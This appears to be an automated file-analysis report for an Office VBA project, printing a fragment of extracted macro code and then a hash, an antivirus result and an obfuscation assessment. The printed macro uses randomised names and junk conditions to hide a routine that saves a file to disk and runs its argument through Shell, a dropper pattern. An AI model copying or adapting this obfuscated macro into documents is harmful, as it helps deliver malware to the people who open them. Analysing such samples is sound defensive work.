XP38pmR5sTdSjBW If 52 < 220 Then ' xBkZEwz64tmjo0Tg Else ' POD5u4iNyjscvVGtX MsgBox "oypWnk52CO0M" End If DcPpzZFIKYQ4kg.SaveToFile b12OiWrMSUFkLR$, 2 If 1039 - 33 = 26420 / 5284 Then WtyJUSjXWDNRYv = "yUpluhBMPw" End If uyl6VNQoX0FB = "WW1kiDtVcY7hvnML" x7l8u0GYT = WtyJUSjXWDNRYv & uyl6VNQoX0FB If 46 < 178 Then ' Vs03HtmTf Else ' R6sUiJEpqnXPto MsgBox "w2KjfA8NT" End If Dim tnVaXRf2UhPiWlsO5 tnVaXRf2UhPiWlsO5 = 250 While tnVaXRf2UhPiWlsO5 <= 970 tnVaXRf2UhPiWlsO5 = tnVaXRf2UhPiWlsO5 + 32 Wend LkFuLmtCIjDaEnA = 46900 YefhZPNC9 = dkXsgOE8RFz4 & tnVaXRf2UhPiWlsO5 DcPpzZFIKYQ4kg.Close: Set DcPpzZFIKYQ4kg = Nothing End If If 938 + 6 = 1904 - 1894 Then UuFqTrUAN = "w6VSCjnY1Kb" End If BmhjZQ3WRYpeI2DL = 29643 IH6hBM1j94SkdU0b = UuFqTrUAN & BmhjZQ3WRYpeI2DL If 31 < 210 Then ' MdTGYkgBzX7Qu45 Else ' SDSta5vzb8kNURLP MsgBox "Q68iHyhLJ5x" End If Set WSiKV4zpePnv6csAY = Nothing End Function Attribute VB_Name = "frmMain" Attribute VB_Base = "0{8D6705FA-45E9-4541-8C5A-E5BB744068BB}{9FB8E253-ED4A-4864-94EF-D0EAA5770CD6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Initialize() ' Initialize Me.Caption = "" End Sub Public Sub hello(bafGXRwJxsNM6HAd) Shell bafGXRwJxsNM6HAd End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	57856 bytes
SHA-256: `9c4b9c8dc2395e716459bc7848e99bc159c1f1953e9548582c86991cbb9cd19e`
Detection ClamAV: No threats found Obfuscation or payload: likely 666 of 1158 identifiers look randomly generated (e.g. 'byBjb25zZXF1YXQuIER1aXMgYXV0ZSBpcnVyZSBk') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.